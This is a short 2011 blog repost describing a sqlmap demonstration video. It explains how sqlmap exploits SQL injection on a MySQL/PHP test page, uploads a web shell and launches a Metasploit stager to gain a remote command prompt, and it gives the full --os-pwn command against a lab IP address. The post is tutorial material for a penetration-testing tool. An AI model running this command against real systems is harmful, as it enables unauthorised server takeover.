Thursday, September 15, 2011

HOWTO : Offical SQLMap video demonstration 11

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being MySQL 5.1.

The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band command prompt session between the user's machine and the database server. When the back-end database is MySQL, ASP and PHP languages do not support stacked queries (ASP.NET does though): there is no way to inject different SQL statements in the same HTTP request.

As a result, sqlmap uploads a web shell in a writable directory within the web server document root and uses it to execute the Metasploit payload stager previously created. The out-of-band command prompt session is now established and the control is passed over to the Metasploit command line interface.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mqsql/get_int.php?id=1 --os-pwn --msf-path /home/inquis/software/metasploit -v 1

That's all! See you.